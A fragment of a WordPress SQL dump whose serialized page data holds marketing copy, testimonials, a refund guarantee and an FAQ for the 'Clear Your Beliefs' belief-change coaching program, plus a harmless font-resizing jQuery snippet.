src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1587, 2032, '_menu_item_type', 'post_type'),
(1588, 2032, '_menu_item_menu_item_parent', '0'),
(1589, 2032, '_menu_item_object_id', '1941'),
(1590, 2032, '_menu_item_object', 'page'),
(1591, 2032, '_menu_item_target', '_blank'),
(1592, 2032, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(1593, 2032, '_menu_item_xfn', ''),
(1594, 2032, '_menu_item_url', '');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1596, 2038, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:16:"Ok I''m convinced";s:4:"text";s:238:"<center><a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:60650:"<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your 